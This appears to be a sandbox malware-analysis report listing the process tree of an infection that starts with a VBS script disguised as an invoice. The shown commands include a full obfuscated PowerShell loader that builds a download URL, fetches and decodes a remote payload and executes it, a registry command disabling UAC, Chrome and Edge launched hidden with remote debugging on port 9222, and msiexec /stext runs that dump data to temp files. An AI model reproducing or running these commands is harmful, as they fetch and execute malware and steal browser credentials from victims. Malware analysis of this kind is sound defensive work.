PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 2524 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 2524 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20b4cc40,0x7ffa20b4cc4c,0x7ffa20b4cc58

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1788,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1784 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2304 /prefetch:8

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\chkhknudvoswssthjrngsvoistntkipd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\chkhknudvoswssthjrngsvoistntkipd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mjpz"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:1

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pdukeyy"

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4620,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4600 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa303246f8,0x7ffa30324708,0x7ffa30324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

